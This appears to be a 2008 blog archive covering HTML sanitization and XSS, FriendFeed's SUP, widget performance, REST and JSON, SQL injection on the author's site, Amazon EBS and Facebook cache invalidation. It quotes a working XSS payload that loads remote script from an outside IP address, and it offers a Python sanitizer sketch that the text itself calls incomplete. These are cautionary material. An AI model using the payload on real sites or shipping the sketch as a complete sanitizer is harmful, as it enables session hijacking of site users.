I'm often surprised by how common it is for developers to prefer reinventing the wheel to using off-the-shelf libraries when solving problems. This practice isn't limited to newbies who don't know any better; it extends to experienced developers who should know better. Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others to justify reinventing the wheel. For example, take this conversation that flowed through my Twitter stream yesterday

Jon Galloway
jongalloway: @codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Web site called stackoverflow.com. It is a question and answer site where users ask programming questions and vote on the best answers. You can think of it as Yahoo! Answers but dedicated to programming. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems where he wrote

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting (XSS) attacks. The problem with Jeff's approach, which was pointed out in the comments by many people including Simon Willison, is that using regexes to filter HTML input this way assumes you will receive fairly well-formed HTML. As many developers have found out the hard way, you also have to worry about malformed HTML, thanks to the liberal HTML parsing policies of modern Web browsers. To use this approach safely you pretty much have to reverse engineer every HTML parsing quirk of common browsers, or you will end up storing HTML which looks safe but actually contains an exploit. Instead, Jeff really should have been looking at a full fledged HTML parser such as SgmlReader or Beautiful Soup rather than regular expressions.
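
To make the parser-based approach concrete, here's a minimal sketch of a whitelist sanitizer built on Python's standard html.parser module instead of regular expressions. The tag and attribute whitelist is illustrative, not a complete or audited policy, and a real sanitizer would also need to vet URL schemes and drop the contents of dangerous elements.

from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "strong", "i", "em", "blockquote", "pre", "code", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}

class WhitelistSanitizer(HTMLParser):
    """Re-emits whitelisted tags and escapes all other markup as plain text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop disallowed start tags entirely
        allowed = ALLOWED_ATTRS.get(tag, set())
        attr_text = "".join(
            ' %s="%s"' % (name, escape(value or "", quote=True))
            for name, value in attrs
            if name in allowed
        )
        self.out.append("<%s%s>" % (tag, attr_text))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))  # text content is always escaped

def sanitize(html_input):
    # Note: this sketch does not vet URL schemes (javascript: links) or remove the
    # text inside dangerous elements like <script>; a production sanitizer must.
    parser = WhitelistSanitizer()
    parser.feed(html_input)
    parser.close()
    return "".join(parser.out)

print(sanitize('<b>hi</b><script>alert(1)</script>'))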

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies: HttpOnly where he acknowledges his mistake as follows

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 

The sad thing is that Jeff Atwood isn't the first nor will he be the last programmer to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show how tricky it is to get the right solution to this seemingly trivial problem. Additionally, it is sad to note that despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future. That is unfortunate, given that it is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list, not the first. Otherwise, you might just end up a candidate for The Daily WTF and deservedly so.

Now Playing: T-Pain - Cant Believe It (feat. Lil Wayne)


 

Categories: Programming

Paul Buchheit of FriendFeed has written up a proposal for a new protocol that Web sites can implement to reduce the load on their services from social network aggregators like FriendFeed and SocialThing. He unveils his proposal in his post Simple Update Protocol: Fetch updates from feeds faster which is excerpted below

When you add a web site like Flickr or Google Reader to FriendFeed, FriendFeed's servers constantly download your feed from the service to get your updates as quickly as possible. FriendFeed's user base has grown quite a bit since launch, and our servers now download millions of feeds from over 43 services every hour.

One of the limitations of this approach is that it is difficult to get updates from services quickly without FriendFeed's crawler overloading other sites' servers with update checks. Gary Burd and I have thought quite a bit about ways we could augment existing feed formats like Atom and RSS to make fetching updates faster and more efficient. Our proposal, which we have named Simple Update Protocol, or SUP, is below.
...
Sites wishing to produce a SUP feed must do two things:

  • Add a special <link> tag to their SUP enabled Atom or RSS feeds. This <link> tag includes the feed's SUP-ID and the URL of the appropriate SUP feed.
  • Generate a SUP feed which lists the SUP-IDs of all recently updated feeds.

Feed consumers can add SUP support by:

  • Storing the SUP-IDs of the Atom/RSS feeds they consume.
  • Watching for those SUP-IDs in their associated SUP feeds.

By using SUP-IDs instead of feed urls, we avoid having to expose the feed url, avoid URL canonicalization issues, and produce a more compact update feed (because SUP-IDs can be a database id or some other short token assigned by the service). Because it is still possible to miss updates due to server errors or other malfunctions, SUP does not completely eliminate the need for polling.

Although there's a healthy conversation about SUP going on in FriendFeed in response to one of my tweets, I thought it would be worth sharing some thoughts on this with a broader audience.

The problem statement that FriendFeed's SUP addresses is the following issue raised in my previous post When REST Doesn't Scale, XMPP to the Rescue?

On July 21st, FriendFeed had 45,000 users who had associated their Flickr profiles with their FriendFeed account. FriendFeed polls Flickr about once every 20 – 30 minutes to see if the user has uploaded new pictures. However only about 6,000 of those users logged into Flickr that day, let alone uploaded pictures. Thus there were literally millions of HTTP requests made by FriendFeed that were totally unnecessary.

FriendFeed's proposal is similar to the Six Apart Update Stream and the Twitter XMPP Firehose in that it is a data stream containing information about all of the updates users are making on a particular service. It differs in a key way in that it doesn't actually contain the data from the user updates but instead contains identifiers which can be used to determine which users changed so their feeds can be re-polled.

This approach also protects feeds that rely on security through obscurity such as Google Reader's Shared Items feed and Netflix's Personalized Feeds. The user shares their "secret" feed URL with FriendFeed, which then obtains the SUP ID of the user's feed when the feed is first polled. Then whenever that SUP ID is seen in the SUP feed by FriendFeed, they know to go re-poll the user's "secret" feed URL.
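
To make the consumer side concrete, here's a rough sketch of the polling loop an aggregator might run against a SUP-enabled service. I'm assuming, based on my reading of the proposal, that the SUP feed is a JSON document whose "updates" member lists recently changed SUP-IDs; the field names and URLs below are guesses for illustration, not the finalized format.

import json
import time
import urllib.request

# Hypothetical local state: SUP-ID -> "secret" feed URL, learned when each
# feed was first polled and its <link> tag inspected.
sup_id_to_feed_url = {
    "3cd8a0a7": "http://example.com/reader/shared/SECRET-TOKEN/atom",
    "9f2b11c4": "http://example.com/photos/12345/atom",
}

SUP_FEED_URL = "http://example.com/sup.json"  # assumed location of the provider's SUP feed

def poll_sup_feed():
    """Fetch the SUP feed and return the set of SUP-IDs that changed recently."""
    with urllib.request.urlopen(SUP_FEED_URL) as response:
        document = json.load(response)
    # Assumption: each entry in "updates" is a (SUP-ID, timestamp) pair.
    return {entry[0] for entry in document.get("updates", [])}

def process_feed(raw_bytes):
    print("got %d bytes of feed data" % len(raw_bytes))

def refetch_updated_feeds():
    changed = poll_sup_feed()
    for sup_id, feed_url in sup_id_to_feed_url.items():
        if sup_id in changed:
            # Only feeds whose SUP-ID appeared get re-polled; everything else is skipped.
            with urllib.request.urlopen(feed_url) as response:
                process_feed(response.read())

if __name__ == "__main__":
    while True:
        refetch_updated_feeds()
        time.sleep(60)  # a slow fallback poll is still needed, since SUP can miss updates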

For services that are getting a ton of traffic from social network aggregators or Web-based feed readers it does make sense to provide some sort of update stream or fire hose to reduce the amount of polling that gets done. In addition, it also makes sense that if more and more services are going to provide such update streams then it should be standardized so that social network aggregators and similar services do not end up having to target multiple update protocols.

I believe that in the end we will see a continuum of options in this space. The vast majority of services will be OK with the load generated by social networking aggregators and Web-based feed readers polling their feeds. These services won't see the point of building additional features to handle this load. Some services will run the numbers like Twitter & Six Apart have done and will provide update streams in an attempt to reduce the impact of polling. For these services, SUP seems like a somewhat elegant solution and it would be good to standardize on something; anything at all is better than each site having its own custom solution. For a smaller set of services, this still won't be enough since they don't provide feeds (e.g. Blockbuster's use of Facebook Beacon) and you'll need an explicit server to server publish-subscribe mechanism. XMPP or perhaps an HTTP-based publish-subscribe mechanism like the one Joshua Schachter proposed a few weeks ago will be the best fit for those scenarios. 

Now Playing: Jodeci - I'm Still Waiting


 

Categories: Web Development

I've been reading about the Ning vs. WidgetLaboratory drama on TechCrunch. The meat of the conflict seems to be that widgets from WidgetLaboratory were so degrading the user experience of Ning that they had to be cut off. The relevant excerpts from the most recent TechCrunch story on the war of words are below

For those of you not closely following the drama between social network platform Ning and a popular widget provider called WidgetLaboratory, you can read the background here. On Friday Ning unceremoniously shut down their access to Ning, making all those widgets vanish.
...
In an email to WL on August 2 (more than three weeks ago), CEO Gina Bianchini wrote “Our only goal is to have you build your products in such a way that doesn’t slow down the networks running your products or takedown the Ning Platform with what you’re doing. Both of those would result in us needing to shutdown WidgetLaboratory products and that’s has never been our first choice of options. Hopefully, you know this after 8 months of working with us.”

Ignoring the he said, she said nature of the communication between both companies, there is a legitimate concern that 3rd party widgets included on the pages of a Web site can degrade performance to the extent that the site becomes unusably slow. In fact, TechCrunch has had similar problems with 3rd party widgets, as Mike Arrington has mentioned on his personal blog, which led to him excluding the widgets from his site.

Typically, widgets are embedded in a site by including references to Javascript hosted on a 3rd party site in the page's HTML. This means rendering the page is dependent on how quickly the script files can be downloaded from the 3rd party site AND how long the script takes to execute, especially since it may also fetch data from one or more servers. Thus a slow server or a badly written script can make every page that embeds the widget unbearably slow to render. Given that the ability to embed widgets is a key feature of social networking sites, it is important for such sites to figure out how to isolate their user experience from badly written widgets or widgets hosted on slow Web servers.

Below are some best practices that have emerged on how social networking sites can immunize themselves from the kinds of problems Ning has had with WidgetLaboratory

  1. Host the Scripts Yourself: If you have a popular site, it is quite likely that you have more resources to handle lots of page views than the typical widget developer. Thus it makes sense to remove the dependency on externally hosted scripts by hosting the widgets yourself. Microsoft encourages developers to submit their gadgets to Windows Live Gallery if they want to build gadgets for my.live.com or Windows Live Spaces. For its AJAX homepage service, Google does not require developers to submit gadgets for hosting but instead caches gadget data for hours at a time, which means Google is effectively hosting the gadgets itself for the majority of accesses by its users (a minimal caching proxy along these lines is sketched after this list).

  2. Keep External Dependencies off of Pages that Need to Render Quickly: In many cases, it isn't feasible to host all of the data and content related to widgets that are being shown on your site. In that case, you should ensure that the key scenarios on your Web site are insulated from the problems caused by slow or broken 3rd party widgets. For example, on Facebook viewing someone's profile is a key part of the user experience, and it is important to make sure it happens as quickly and as smoothly as possible. For this reason, Facebook caches all 3rd party content that shows up on a user's profile and requires applications to call Profile.SetFBML to add content to the profile instead of providing a way to directly embed widgets on a user's profile.

  3. Make It Clear Who Is to Blame if Things go Awry: One of the issues raised by Ning in their conflict with WidgetLaboratory is that user pages wouldn't render correctly or would show degraded performance due to WidgetLaboratory's widgets, but Ning would get the support calls. This kind of user confusion is avoided if the user experience makes it clear when the failure of a page to render correctly is the fault of the external widget and when it is the fault of the hosting site. For example, Facebook Canvas Pages for applications make it clear that the user is using a 3rd party application that is not part of the core Facebook experience. I've seen lots of users complain about the slowness of Scrabulous and Scrabble but never seen anyone who thought that Facebook was to blame rather than the application developers.
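
As a rough illustration of the first practice, here's a minimal sketch of a server-side caching proxy that serves third-party gadget content from your own infrastructure and only goes back to the widget host after a TTL expires, roughly in the spirit of what Google does for its AJAX homepage gadgets. The URL and cache policy are made up for the example.

import time
import urllib.request

CACHE_TTL_SECONDS = 4 * 60 * 60  # refresh externally hosted gadget content every few hours
_cache = {}  # gadget URL -> (fetched_at, content)

def get_gadget_content(gadget_url):
    """Return gadget content, hitting the third-party host only when the cached copy is stale."""
    now = time.time()
    cached = _cache.get(gadget_url)
    if cached and now - cached[0] < CACHE_TTL_SECONDS:
        return cached[1]
    try:
        with urllib.request.urlopen(gadget_url, timeout=2) as response:
            content = response.read()
    except OSError:
        # The widget host is slow or down: serve the stale copy rather than block page rendering.
        if cached:
            return cached[1]
        return b""  # degrade gracefully instead of failing the whole page
    _cache[gadget_url] = (now, content)
    return content

print(len(get_gadget_content("http://widgets.example.com/leaderboard.js")))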

Following some of these practices would have saved Ning and its users some of their current grief.

Now Playing: Ice Cube - Get Money, Spend Money, No Money


 

Categories: Platforms | Social Software

My recent post, Explaining REST To Damien Katz, led to some insightful comments from Dave Winer and Tim Bray about what proponents of building RESTful Web services can learn from remote procedure call (RPC) technologies like SOAP and XML-RPC. 

In his post, Dare left something out (and it's important), Dave Winer wrote

Really ought to include it in your thinking, Dare and everyone else. You're missing out on something that works really well. You should at least learn the lessons and add to REST what it needs to catch up with XML-RPC. Seriously.

What's missing in REST, btw, is a standard method of serializing structs, lists and scalar types. The languages we use have a lot more in common than you might think. We're all writing code, again and again, every time we support a new interface that could be written once and then baked into the kernels of our languages, and then our operating systems. Apple actually did this with Mac OS, XML-RPC support is baked in. So did Python. So if you think it's just me saying this, you should take another look.

Dave has a valid point: a lot of the time, communication between distributed systems is simply passing around serialized objects and/or collections of objects. In such cases, having a lightweight standard representation for serialized objects which is supported on multiple platforms would be beneficial. Where Dave goes astray is in his assertion that no such technology exists for developers building RESTful Web services. Actually one does, and it is widely deployed on the Web today. JavaScript Object Notation (JSON), described in RFC 4627, is a well-defined media type (application/json) for representing serialized structs, lists and scalar values on the Web. 

There are libraries for processing JSON on practically every popular platform from "corporate" platforms like Java and the .NET Framework to Web scripting languages like Python and Ruby. In addition, JSON is attractive because it is natively available in modern Web browsers that support JavaScript which means you can use it to build services that can be consumed by Web browsers, other Web services or desktop applications with a single end point.
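
As a quick illustration of JSON filling the role Dave describes, here's how a struct, a list and some scalar values round-trip through Python's standard json module; the payload is just an example.

import json

# A "struct", a list and scalar values, exactly the kinds of data XML-RPC was built to carry.
payload = {
    "user": {"name": "Dare", "posts": 1247, "active": True},
    "tags": ["rest", "json", "web-services"],
    "score": 4.5,
}

wire_format = json.dumps(payload)          # serialize to the application/json media type
round_tripped = json.loads(wire_format)    # any JSON library on any platform can parse this

assert round_tripped == payload
print(wire_format)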

Tim Bray cautioned REST proponents against blindly rejecting the features typically associated with RPC systems and SOAP/WS-* in his post REST Questions where he wrote

Has REST Been Fortunate in its Enemies? · I have been among the most vocal of those sneering at WS-*, and I’m comfortable with what I’ve said. But that doesn’t prove that the core WS-* ideas are wrong. Here are some of the handicaps WS-* struggled under:

  • Lousy foundational technologies (XSD and WSDL).

  • A Microsoft/IBM-driven process that was cripplingly product-linked and political.

  • Designers undereducated in the realities of the Web as it is.

  • Unnecessary detours into Architecture Astronautics.

As a result, we should be really careful about drawing lessons from the failure of WS-*. Specifically:

  • Just because the XSD type system is malformed, you can’t conclude that the notion of schema-driven mapping between program data types and representation payloads is harmful.

  • Just because WSDL is a crock, you can’t conclude that exposing a machine-readable contract for a service is a necessarily bad idea.

  • Just because UDDI never took off, you can’t conclude that service registries are dumb.

  • Just because SOAP has a damaging MustUnderstand facility and grew a lot of ancillary specification hair, you can’t conclude that some sort of re-usable payload wrapper is necessarily a dead-end path.

  • Just because the WS-* security specifications are overengineered and based on a shaky canonicalization spec, you can’t conclude that message-level security and signing aren’t sometimes real important.

And so on. I personally tend to think that schema-driven mapping is hopeless, contracts are interesting, registries are a fantasy, and payload wrappers are very promising. But I don’t think that the history of WS-* is a very good argument for any of those positions.

In a lot of situations where applications consume XML, the first thing the application does is convert the XML into an object graph representative of the business logic of the application. The SOAP/WS-* way of doing this was to define an XSD schema for the XML payload and then use some object<->XML mapping layer to convert the XML to objects. The problem with this approach was that there is a fundamental impedance mismatch between XSD types and OO types, which led to horrible interoperability problems since no two platforms could agree on how to map the various esoteric type system features of XSD into the structs, lists and scalar types that are the building blocks of all OO type systems. However these problems go away if you use a data format that was explicitly designed for describing serialized data objects like JSON.

Providing a machine readable description of a service's end points is useful, especially on the Web where multiple services may expose the same interface. For example, when you visit my weblog at http://www.25hoursaday.com/weblog/ using Firefox 2 or higher or Internet Explorer 7 or higher, the browser immediately lights up with a feed icon which allows you to subscribe to my Atom feed from your Web browser. This happens because I've provided a machine readable description of my feed end points on my blog. The Atom Publishing Protocol, which is one of the most well-designed RESTful protocols out there, has a notion of service documents which enable client applications to discover the capabilities and locations of the various end points of the service.

If you put together the notion of service documents with using JSON as the payload format for a service endpoint, you're close to getting the touted programmer friendliness of RPC technologies like XML-RPC & SOAP/WSDL while still building a RESTful service which works with the Web instead of against it.

The only problem is how to deal with statically typed languages like C# and Java. These languages need the types of the objects that the application will consume from a Web service defined up front. So if we could just figure out how to come up with service documents for JSON services that included the notion of a class definition, we could pretty much have our cake and eat it too with regards to getting the ease of use of an RPC system while building a RESTful service.
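
Purely as a thought experiment, a service document for such a JSON service might look something like the following. Every field name here is invented for illustration and doesn't correspond to any actual proposal.

import json

# A hypothetical "JsonPub" service document: endpoints plus enough type
# information for a statically typed client to generate classes up front.
service_document = {
    "service": "http://example.com/api/",
    "collections": [
        {
            "name": "questions",
            "href": "http://example.com/api/questions/",
            "accepts": "application/json",
            "type": {
                "name": "Question",
                "fields": {"id": "int", "title": "string", "tags": "list<string>"},
            },
        }
    ],
}

print(json.dumps(service_document, indent=2))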

If this sounds interesting to you, then you should go over and read Joe Gregorio's original post on RESTful JSON and then join the restful-json mailing list. Joe's proposal is on the right path although I think he is letting his background as an editor of the Atom Publishing Protocol specification skew his thinking with regards to what developers would find most useful from a Json Publishing Protocol (JsonPub).

Now Playing: G-Unit - Beg For Mercy


 

August 24, 2008
@ 11:32 AM

Last week my blog was offline for a day or so because I was the victim of a flood of SQL injection attacks that are still hitting my Web site at the rate of multiple requests a second. I eventually managed to counter the attacks by installing URLScan 3.0 and configuring it to reject HTTP requests that resemble SQL injection attacks. I found out about URLScan in two ways: from a blog post Phil Haack wrote about Dealing with Denial of Service Attacks, where it seems he's been caught up in the same wave of attacks that brought down my blog, and via an IM from Scott Hanselman, who saw my tweet on Twitter about being hacked and pointed me to his blog post on the topic entitled Hacked! And I didn't like it - URLScan is Step Zero.

This reminded me that I similarly found another useful utility, WinDirStat, via a blog post as well. In fact, when I think about it, a lot of the software I end up trying out is found via direct or indirect recommendations from people I know, typically through blog posts, tweets or some other communication via a social networking or social media service. This phenomenon can be clearly observed in closed application ecosystems like the Facebook platform, where statistics have shown that the majority of users install new applications after viewing them on the profiles of their friends.

One of the things I find most interesting about the Facebook platform and now the Apple App Store is that they are revolutionizing how we think about software distribution. Today, finding interesting new desktop/server/Web apps either happens serendipitously via word of mouth or [rarely] is the result of advertising or PR. However finding interesting new applications if you are a user of Facebook or the Apple iPhone isn't a matter of serendipity. There are well understood ways of finding interesting applications that harness social and network effects, from user ratings to simply finding out what applications your friends are using.

I sometimes wish I had an equivalent experience as a user of desktop applications and their extensions. I've often thought it would be cool to be able to browse the software likes and dislikes of people such as Omar Shahine, Scott Hanselman and Mike Torres to see what their favorite Windows utilities and mobile applications were. As a developer of a feed reader, although it is plain to see that Windows has a lot of reach since practically everyone runs it, I'm sometimes envious of the built-in viral distribution features that come with the Facebook platform or the unified software distribution experience that is the iPhone App Store. It sure beats hosting your app on SourceForge and hoping that your users blog about the app to spread it via word of mouth, or paying for prominence on sites like Download.com.

A lot of the pieces are already there. Microsoft has a Windows Marketplace, but for the life of me I'd never have found out about it if I didn't work at Microsoft and hadn't known someone who switched teams to start working there. There are also services provided by 3rd parties like Download.com, the Firefox Add-Ons page and Tucows. It would be interesting to see what could be stitched together if you throw in a social graph via something like Facebook Connect, an always-on, well integrated desktop experience similar to the Apple App Store and one of the aforementioned sites. I suspect the results would be quite beneficial to app developers and users of Windows applications.

What do you think?

Now Playing: Metallica - The Day That Never Comes


 

Categories: Technology

According to Werner Vogels's blog post entitled Amazon EBS - Elastic Block Store has launched, it seems that my friends at Amazon have plugged a gaping hole in their cloud computing platform story. Werner writes

Back in the days when we made the architectural decision to virtualize the internal Amazon infrastructure one of the first steps we took was a deep analysis of the way that storage was used by the internal Amazon services. We had to make sure that the infrastructure storage solutions we were going to develop would be highly effective for developers by addressing the most common patterns first. That analysis led us to three top patterns:

  1. Key-Value storage. The majority of the Amazon storage patterns were based on primary key access leading to single value or object. This pattern led to the development of Amazon S3.
  2. Simple Structured Data storage. A second large category of storage patterns were satisfied by access to simple query interface into structured datasets. Fast indexing allows high-speed lookups over large dataset. This pattern led to the development of Amazon SimpleDB. A common pattern we see is that secondary keys to objects stored in Amazon S3 are stored in SimpleDB, where lookups result in sets of S3 (primary) keys.
  3. Block storage. The remaining bucket holds a variety of storage patterns ranging from special file systems such as ZFS to applications managing their own block storage (e.g. cache servers) to relational databases. This category is served by Amazon EBS which provides the fundamental building block for implementing a variety of storage patterns.

What I like about Werner's post is that it shows that Amazon had a clear vision and strategy around providing hosted cloud services and has been steadily executing on it.

S3 handles what I've typically heard described as "blob storage". A typical Web application has media files and other resources (images, CSS stylesheets, scripts, video files, etc) that are simply accessed by name/path. However a lot of these resources also have metadata (e.g. a video file on YouTube has metadata about its rating, who uploaded it, number of views, etc) which needs to be stored as well. This need for queryable, schematized storage is where SimpleDB comes in. EC2 provides a virtual server that can be used for computation, complete with a local file system instance which isn't persistent if the virtual server goes down for any reason. With SimpleDB and S3 you have the building blocks to build a large class of "Web 2.0" style applications once you throw in the computational capabilities provided by EC2.
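
To illustrate the division of labor Werner describes, here's a toy sketch of the "secondary keys in SimpleDB pointing at primary keys in S3" pattern, using plain in-memory dictionaries as stand-ins for the two services; none of this is actual AWS API code.

# In-memory stand-ins for the two storage services (not real AWS APIs).
blob_store = {}      # plays the role of S3: primary key -> opaque blob
metadata_store = []  # plays the role of SimpleDB: list of queryable attribute dicts

def upload_video(video_id, raw_bytes, uploader, rating):
    # The blob goes into "S3" under its primary key...
    blob_store[video_id] = raw_bytes
    # ...while the queryable metadata, including the S3 key, goes into "SimpleDB".
    metadata_store.append({"s3_key": video_id, "uploader": uploader, "rating": rating})

def videos_by_uploader(uploader):
    """Query the metadata store on a secondary key, then resolve the S3 primary keys."""
    keys = [item["s3_key"] for item in metadata_store if item["uploader"] == uploader]
    return [(key, blob_store[key]) for key in keys]

upload_video("vid-001", b"fake-bytes", uploader="dare", rating=5)
upload_video("vid-002", b"more-bytes", uploader="dare", rating=3)
print([key for key, _ in videos_by_uploader("dare")])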

However neither S3 nor SimpleDB provides a solution for a developer who simply wants the typical LAMP or WISC developer experience of building a database driven Web application or for applications that may have custom storage needs that don't fit neatly into the buckets of blob storage or schematized storage. Without access to a persistent filesystem, developers on Amazon's cloud computing platform have had to come up with sophisticated solutions involving backing data up manually from EC2 to S3 to get the desired experience.

EBS is the final piece in the puzzle that had prevented Amazon's cloud computing platform from being comparable to traditional hosting solutions. With EBS, Amazon is now superior to most traditional hosting solutions from a developer usability perspective as well as cost. Google App Engine now looks like a plaything in comparison. In fact, you could build GAE on top of Amazon's cloud computing platform now that EBS has solved the persistent custom storage problem. It will be interesting to see if higher level cloud computing platforms such as App Engine start getting built on top of Amazon's cloud computing platform. Simply porting GAE wholesale would be an interesting academic exercise and a fun hacking project. 

Now Playing: T.I. - Whatever You Like


 

Last year I wrote a blog post entitled When Databases Lie: Consistency vs. Availability in Distributed Systems where I talked about the kinds of problems Web applications face when trying to keep data consistent across multiple databases spread out across the world.

Jason Sobel, a developer at Facebook, has some details on how they've customized MySQL to solve a variation of the problem I posed, in a blog post entitled Scaling Out where he writes

A bit of background on our caching model: when a user modifies a data object our infrastructure will write the new value in to a database and delete the old value from memcache (if it was present). The next time a user requests that data object we pull the result from the database and write it to memcache. Subsequent requests will pull the data from memcache until it expires out of the cache or is deleted by another update.

...

Consider the following example:

  1. I update my first name from "Jason" to "Monkey"
  2. We write "Monkey" in to the master database in California and delete my first name from memcache in California and Virginia
  3. Someone goes to my profile in Virginia
  4. We don't find my first name in memcache so we read from the Virginia slave database and get "Jason" because of replication lag
  5. We update Virginia memcache with my first name as "Jason"
  6. Replication catches up and we update the slave database with my first name as "Monkey"
  7. Someone else goes to my profile in Virginia
  8. We find my first name in memcache and return "Jason"

Until I update my first name again or it falls out of cache and we go back to the database, we will show my first name as "Jason" in Virginia and "Monkey" in California. Confusing? You bet. Welcome to the world of distributed systems, where consistency is a really hard problem.

Fortunately, the solution is a lot easier to explain than the problem. We made a small change to MySQL that allows us to tack on extra information in the replication stream that is updating the slave database. We used this feature to append all the data objects that are changing for a given query and then the slave database "sees" these objects and is responsible for deleting the value from cache after it performs the update to the database.

...

The new workflow becomes (changed items in bold):

  1. I update my first name from "Jason" to "Monkey"
  2. We write "Monkey" in to the master database in California and delete my first name from memcache in California but not Virginia
  3. Someone goes to my profile in Virginia
  4. We find my first name in memcache and return "Jason"
  5. Replication catches up and we update the slave database with my first name as "Monkey." We also delete my first name from Virginia memcache because that cache object showed up in the replication stream
  6. Someone else goes to my profile in Virginia
  7. We don't find my first name in memcache so we read from the slave and get "Monkey"

Facebook's solution is clever and at first I couldn't shake the feeling that it is an example of extremely tight coupling for database replication to also be responsible for evicting expired items from your in-memory cache. After some thought, I realized that this is no different from the SqlCacheDependency class in ASP.NET which allows you to create a dependency between objects in your ASP.NET cache and those in your SQL database. When the underlying tables change, the Cache is updated to reflect this change in database state.

In fact, the combination of replication and the SqlCacheDependency class should mean that you get this sort of behavior for free if you are using ASP.NET caching and SQL Server. Unfortunately, it looks like Microsoft's upcoming in-memory distributed object caching product, Velocity, won't support SqlCacheDependency in its initial release according to a comment by one of its developers.  

Of course, there is a significant performance difference between actively monitoring the database for changes like SqlCacheDependency does and updating the cache when updates made to the database are received as part of the replication stream. I wonder if this pattern will turn out to be generally useful to Web developers (at least those of us who work on geo-distributed services) or whether this will just go down as a clever hack from those kids at Facebook that was cool to share.
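
For concreteness, here's a minimal sketch of the two halves of the pattern: the standard cache-aside read path Sobel describes, plus a slave-side step that deletes cache entries based on invalidation hints carried in the replication stream. The event structure and the memcache calls (get/set/delete, as exposed by the python-memcached library) are simplified assumptions, not Facebook's actual implementation.

import memcache  # python-memcached client; assumes a memcached instance on localhost

mc = memcache.Client(["127.0.0.1:11211"])

def get_first_name(user_id, read_from_slave_db):
    """Cache-aside read path: memcache first, fall back to the (possibly lagging) slave DB."""
    key = "user:%d:first_name" % user_id
    value = mc.get(key)
    if value is None:
        value = read_from_slave_db(user_id)  # may return stale data due to replication lag
        mc.set(key, value)
    return value

def apply_replication_event(event, apply_to_slave_db):
    """Slave-side step: apply the update, then evict the cache keys named in the event.

    'event' is an assumed structure: the SQL to apply plus the cache keys the master
    tacked onto the replication stream for this query.
    """
    apply_to_slave_db(event["sql"])
    for key in event["invalidate_keys"]:
        mc.delete(key)  # eviction happens only after the slave has the new value

# Example event shape (illustrative only), applied against a stand-in for the slave DB.
event = {
    "sql": "UPDATE users SET first_name = 'Monkey' WHERE id = 42",
    "invalidate_keys": ["user:42:first_name"],
}
apply_replication_event(event, apply_to_slave_db=lambda sql: None)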

Now Playing: Rihanna - Disturbia


 

Categories: Web Development

August 17, 2008
@ 12:33 PM

Damien Katz recently caused a stir on a bunch of the blogs I read with his post entitled REST, I just don't get it where he wrote

As the guy who created CouchDB, I should be a big cheerleader for RESTful architectures. But the truth is, I just don't get it.

For CouchDB, REST makes absolutely insanely perfect sense. Read a document, edit, put the document back. Beautiful. But for most applications, enterprise or not, I don't see what the big win is.

I know what is wrong with SOAP, and it has everything to do with unnecessary complexity and solving the same problems twice. But what is the big advantage of making all your calls into GET PUT and DELETE? If POST can handle everything you need, then what's the problem?

I guess what I mean to say is just because SOAP is a disaster, doesn't somehow make REST the answer. Simpler is better, and REST is generally simpler than SOAP. But there is nothing wrong with a plain old POST as an RPC call. If its easy to make all your calls conform to the RESTful verb architecture, then that's good, I guess.

His post made the rounds on the expected social news sites like programming.reddit and Hacker News, where I was amused to note that my blog is now being used as an example of silly REST dogma by REST skeptics in such discussions. From reading Damien's post and the various comments in response, it seems clear that there are several misconceptions as to what constitutes REST and what its benefits are from a practical perspective.

Background: The Origins of REST vs. SOAP

The Representational State Transfer (REST) architectural style was first described in Chapter 5 of Roy Fielding's Ph.D dissertation published in 2000. It describes the architecture of the Web from the perspective of one of the authors of the HTTP 1.1 specification which was published the year before in 1999. Around the same time Don Box, Dave Winer and a bunch of folks at Microsoft came up with the Simple Object Access Protocol (SOAP) which they intended to be the standard protocol for building distributed applications on the Web.

